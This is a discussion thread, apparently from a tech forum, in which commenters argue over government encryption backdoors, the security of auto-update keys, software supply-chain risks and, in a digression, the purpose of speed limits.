you don't need to "outlaw math", you only need to increase the friction to the point where commercial providers can't provide encrypted services and 99.x% of people will comply. Not sure why people always bring this up like some gotcha.
The whole chain of e-commerce rests on the foundations of strong encryption, backdooring that would open the door to digital crime at a level that is off the scale compared to where it is today. The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction.
We've already seen plenty of examples of that irl.
> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction.
I'm sympathetic to that argument, but it seems to be employed very selectively by the tech industry.
We already rely on many backdoors of exactly that kind in form of mandatory auto updates. Not only is this seen as perfectly fine, it's widely regarded as a security best practice.
Why can Apple or Google or Microsoft manage to keep their signature keys secure for decades while any keys managed by a government agency would leak with mathematical certainty?
Auto updates are a big security risk themselves, it is a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably review this.
Also: who is to say that Apple, Google or Microsoft manage to keep their keys secret? Not all thieves would be stupid enough to tell, and nationstates tend to hold such advantages on ice until they have a good enough reason to use them.
> Auto updates are a big security risk themselves, it is a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably review this.
And as some lower-hanging fruit: The repos of common programming languages and things like Docker Hub.
Python PIP, NodeJS NPM, Ruby Gems, we pull in a lot of stuff from people we don't even know. Every python project installs a gazillion of stuff from its requirements.txt. At least the OS updates come from a party we at least chose to do business with.
And it's not like this is not yet happening already. But I think it'll take a major Wannacry event before we'll stop doing this because it's just so damn handy.
But if you think of it, imagine you're coding and some random 'willywonka2586' on a public slack group says "Hey I wrote a handy library for that, here, go and install it and use it in a project for your customers!". This is kinda what we're doing.
This actually happened at a company I worked for. One of the Python dependencies of some service or another had a bit of code that phoned home. It was hard to detect, because it actually did the thing it advertised it was supposed to do, just that it added the phone home part. It was only detected because the way routing works inside AWS didn't allow it to phone home, and that generated a lot of network timeouts. IIRC, it took more than 90 days before the malicious library was found out and removed.
Ok but then where is the large-scale movement against auto updates? Stealing an update key would grant an attacker strictly more capabilities than stealing a chat backdoor key: They could still eavesdrop on all chats by patching the apps on-device, but they could also do anything else the device's OS allows them to. Nevertheless I have never read anything about the imminent risk of update compromise.
Such an attack would be soon discovered and soon mitigated. Mandating that the backdoor be present would mean you have to wait for the government to mitigate the problem 6 months later and hope that it didn't soon fall again.
At worst the entire industry in that region is broken more often than they are functional. It's also notable that companies existing in this state of brokenness would be competing with companies living in a functional world. One might find that the defective universe continues long enough its inhabitants are extinct.
> Not only is this seen as perfectly fine, it's widely regarded as a security best practice.
It's not "perfectly fine"; but the alternative is millions of computers with known security vulnerabilities exploitable by anyone, which is far far worse than a potential backdoor used by large companies or governments.
You could make that same argument in favour of the e2e backdoor: "The risk of child groomers, terrorists etc running rampant is far greater than the risk of a few chats getting leaked."
At the very least, this would need some quantification of risk: Probability and impact of keys getting leaked vs probability and impact of not installing a backdoor.
> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction. We've already seen plenty of examples of that irl.
Unfortunately, our beloved decisionmakers are gerontocratic, completely incompetent and bought out by corporate interests that also don't want encryption (e.g. copyright industry).
Alcohol prohibition, and then drug prohibition later, opened the doors to crime at an off-scale level compared to before. (Granted that it wasn't the same kind of door-opening.)
That X makes things worse for people in general just isn't strong evidence that governments will not do X. If you don't want X then you need to explicitly push back.
Except of course that this is entirely unlike speed limits.
In a nutshell, and in case it didn't register with you when it should have: attempts to curb cryptography have been made in the past. The phrase 'you can't outlaw math' is a simple observation: strong cryptography will be available to everybody that wants it regardless of its legal status. So a government that would love to read your mail would do better to realize that they will only be able to read the uninteresting mail and for the rest of it they'll be staring at white noise. Meanwhile the baddies, alerted to the fact that the government is able to read your mail will either resort to other methods of communications or will use channels that they assume to be overt to signal covertly using other methods. There are plenty of examples for this.
So, in conclusion, no matter how much you want to outlaw strong cryptography, those that want it will have it, better plan accordingly or all you will do is waste more time reading data that you will find stupendously boring.
This is not about hardcore cypherpunks or terrorist that want encryption at any cost.
This is about joe random using WhatsApp. And now he has some xanax and pete over there says he deals. Joe probably won't have strong encryption if it is properly outlawed, even if he is a low level dealer.
Because the thing is, making encryption software is hard. I doubt there will be convenient and easy to install software out there if you ban this stuff. And the majority of people won't use it if it isn't convenient and easy to install.
> So a government that would love to read your mail would do better to realize that they will only be able to read the uninteresting mail and for the rest of it they'll be staring at white noise
This is the crux of your argument, but it's false. E2EE has been available for decades but it wasn't used widely, by everyone including criminals, until it was pushed as the default.
Strong encryption has been available for decades as well, but it wasn't used widely until HTTPS and encrypted email. What is your point? That availability doesn't equate use? That's obvious. But now that it is widely used nothing has really changed, we're back where we started: traffic analysis and humint, which is not a bad basis for an investigation or an infiltration op.
It's not as if all of the old volume of mail was steamed open and read or everybody's TV equipped with monitoring equipment. Even libraries did not track who read what (though they did track who borrowed what).
It's more like, "If you outlaw guns, the only people with guns will be outlaws."
And regarding internet privacy and secure communications, that's exactly what they want: for privacy to be associated (in the mind of the average citizen) with organized crime, terrorism and pedophilia.
yet 99% of people break that speed limit regularly. We all know speed limit laws are less about public safety, and more about generating revenue for the state, at least in the US anyway.
and 99.x% of people aren't engaging in sharing child porn anyway, it's the 0.1% of motivated criminals that will share encrypted files anyway, no matter what the law is. They will find ways around the law, they always do.
This is a thinly veiled excuse to take basic human rights away from people.
I'm curious where you get your information about speeding, because it kind of seems made up.
Speeding is tied to one third of traffic fatalities the last 20 years (https://www.nhtsa.gov/risky-driving/speeding), so of course speed limits are put in place in an attempt to increase safety on the road. There are plenty of arguments to be made about the best way to enforce speed limits, or ways to discourage aggressive driving (such as speeding), but there is little doubt that speeding is dangerous.
"Speed related" is another one of those examples where the government lies with statistics to sell some safety FUD while failing to address the root cause of the problem.
Countries such as Germany have much lower traffic fatalities than the USA but they can operate vehicles at much higher speeds. Speed isn't the problem... uneducated drivers, poor vehicle maintenance, poor road quality, etc are the problem. But all those things would upset the masses who think they are entitled to operate a vehicle for 50 years after 2 months of training and a 15 minute test, so (in the USA) we get the lowest common denominator and roadways that are engineered to handle vehicles at 80+MPH are stuck with 55MPH speed limits.
>Speed isn't the problem... uneducated drivers, poor vehicle maintenance, poor road quality, etc are the problem.
Speed isn't the problem, neither are any of the others you mentioned. They all add to the problem of traffic fatalities though.
They did a study in Germany and were able to halve traffic fatalities by adding a speed limit of 130kph on one Autobahn section, measured over 3 years.[1]
Sure you can improve road conditions and driver education, but a multi-pronged approach including speed limits is sensible.
> We all know speed limit laws are less about public safety, and more about generating revenue for the state, at least in the US anyway.
That's absolutely not true. Sure, some stretches are just to generate revenue, but that you're not allowed to go 200km/h through a city is not for revenue generation. It's also not given by common sense - the fact that you need to set the limit 20 lower than what's save should be plenty of evidence.
I don't see how the rest of his point doesn't stand, though. How are they going to implement this? How are they going to "increase friction"?
This is an impossible task. There is no way they will be able to enforce this. It would literally require them to stick their dirty fingers into every piece of software built in the EU.
They can attack large corporations like ISPs and such and force them to do certain things, sure, but there is no way they can "ban" any kind of encryption with any real success, because, as the OC said, it's basically trying to outlaw mathematics. Forcing ISPs to perform deep packet inspection or whatever won't change the axioms of mathematics or fundamentally alter computer science so that they can suddenly break encrypted data coming from their clients.
It depends on whether the actual goal is to catch criminals or to monitor the average Joe. This law won't do anything against criminals ("you can't outlaw math"), but will work very effectively against the average Joe (all major software companies will be forced to comply).
Of course, the argument is that this is to combat criminals and we all know that it doesn't work that way, but it doesn't matter at the end of the day if the true goal is to just monitor people.
you think governments aren't interested in analyzing the private communication of the population? There's a long list of intelligence programs listed on Wikipedia that suggest otherwise. Governments are obviously interested in both with interests going way beyond crime.
And another fact is that these bans can even give you access to the people outside of the law. Practical example, Australia's sting operation of pushing their own 'secure' app on the blackmarket to lure criminals in. (https://www.washingtonpost.com/world/2021/06/08/fbi-app-arre...)
agreed, would not even be surprised if this is being pushed by the larger established email / communication companies as a way to crush smaller competition. In much the same way Facebook is pushing for regulations that only Facebook can afford to implement.